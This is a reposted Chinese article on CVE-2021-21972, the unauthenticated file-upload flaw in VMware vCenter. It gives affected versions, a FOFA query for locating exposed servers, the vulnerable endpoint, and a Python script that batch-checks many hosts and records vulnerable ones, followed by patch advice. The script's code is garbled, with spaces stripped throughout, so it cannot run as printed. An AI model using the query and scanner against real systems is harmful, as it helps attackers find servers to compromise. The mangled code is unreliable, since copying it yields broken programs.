关于Vmware vcenter未授权任意文件上传漏洞(CVE-2021-21972)的问题

2023-07-05 01:47:03 70

背景

CVE-2021-21972vmwarevcenter的一个未授权的命令执行漏洞。该漏洞可以上传一个webshell至vcenter服务器的任意位置，然后执行webshell即可。

影响版本

vmware:esxi:7.0/6.7/6.5
vmware:vcenter_server:7.0/6.7/6.5

漏洞复现fofa查询

语法:title="+ID_VC_Welcome+"

POC

https://x.x.x.x/ui/vropspluginui/rest/services/uploadova

使用https://github.com/QmF0c3UK/CVE-2021-21972-vCenter-6.5-7.0-RCE-POC脚本批量验证

#-*-coding:utf-8-*-
banner="""
888888badP
88`8b88
a88aaaa8P'.d8888b.d8888P.d8888b.dPdP
88`8b.88'`8888Y8ooooo.8888
88.8888..88888888..88
88888888P`88888P8dP`88888P'`88888P'
ooooooooooooooooooooooooooooooooooooooooooooooooooooo
@time:2021/02/24CVE-2021-21972.py
C0debyNebulabdSec-@batsu
"""
print(banner)

importthreadpool
importrandom
importrequests
importargparse
importhttp.client
importurllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
http.client.HTTPConnection._http_vsn=10
http.client.HTTPConnection._http_vsn_str='HTTP/1.0'

TARGET_URI="/ui/vropspluginui/rest/services/uploadova"

defget_ua():
first_num=random.randint(55,62)
third_num=random.randint(0,3200)
fourth_num=random.randint(0,140)
os_type=[
'(WindowsNT6.1;WOW64)','(WindowsNT10.0;WOW64)','(X11;Linuxx86_64)',
'(Macintosh;IntelMacOSX10_12_6)'
]
chrome_version='Chrome/{}.0.{}.{}'.format(first_num,third_num,fourth_num)

ua=''.join(['Mozilla/5.0',random.choice(os_type),'AppleWebKit/537.36',
'(KHTML,likeGecko)',chrome_version,'Safari/537.36']
)
returnua

defCVE_2021_21972(url):
proxies={"scoks5":"http://127.0.0.1:1081"}
headers={
'User-Agent':get_ua(),
"Content-Type":"application/x-www-form-urlencoded"
}
targetUrl=url+TARGET_URI
try:
res=requests.get(targetUrl,
headers=headers,
timeout=15,
verify=False,
proxies=proxies)
#proxies={'socks5':'http://127.0.0.1:1081'})
#print(len(res.text))
ifres.status_code==405:
print("[+]URL:{}--------存在CVE-2021-21972漏洞".format(url))
#print("[+]Commandsuccessresult:"+res.text+"\n")
withopen("存在漏洞地址.txt",'a')asfw:
fw.write(url+'\n')
else:
print("[-]"+url+"没有发现CVE-2021-21972漏洞.\n")
#exceptExceptionase:
#print(e)
except:
print("[-]"+url+"RequestERROR.\n")
defmultithreading(filename,pools=5):
works=[]
withopen(filename,"r")asf:
foriinf:
func_params=[i.rstrip("\n")]
#func_params=[i]+[cmd]
works.append((func_params,None))
pool=threadpool.ThreadPool(pools)
reqs=threadpool.makeRequests(CVE_2021_21972,works)
[pool.putRequest(req)forreqinreqs]
pool.wait()

defmain():
parser=argparse.ArgumentParser()
parser.add_argument("-u",
"--url",
help="TargetURL;Example:http://ip:port")
parser.add_argument("-f",
"--file",
help="UrlFile;Example:url.txt")
#parser.add_argument("-c","--cmd",help="Commandstobeexecuted;")
args=parser.parse_args()
url=args.url
#cmd=args.cmd
file_path=args.file
ifurl!=Noneandfile_path==None:
CVE_2021_21972(url)
elifurl==Noneandfile_path!=None:
multithreading(file_path,10)#默认15线程

if__name__=="__main__":
main()

EXP修复建议

vCenterServer7.0版本升级到7.0.U1c
vCenterServer6.7版本升级到6.7.U3l
vCenterServer6.5版本升级到6.5U3n

到此这篇关于关于Vmwarevcenter未授权任意文件上传漏洞(CVE-2021-21972)的问题的文章就介绍到这了,更多相关Vmwarevcenter上传漏洞内容请搜索毛票票以前的文章或继续浏览下面的相关文章希望大家以后多多支持毛票票！

声明：本文内容来源于网络，版权归原作者所有，内容由互联网用户自发贡献自行上传，本网站不拥有所有权，未作人工编辑处理，也不承担相关法律责任。如果您发现有涉嫌版权的内容，欢迎发送邮件至：czq8825#qq.com（发邮件时，请将#更换为@）进行举报，并提供相关证据，一经查实，本站将立刻删除涉嫌侵权内容。

关于Vmware vcenter未授权任意文件上传漏洞(CVE-2021-21972)的问题

背景

影响版本

漏洞复现fofa查询

EXP修复建议

热门推荐

随机推荐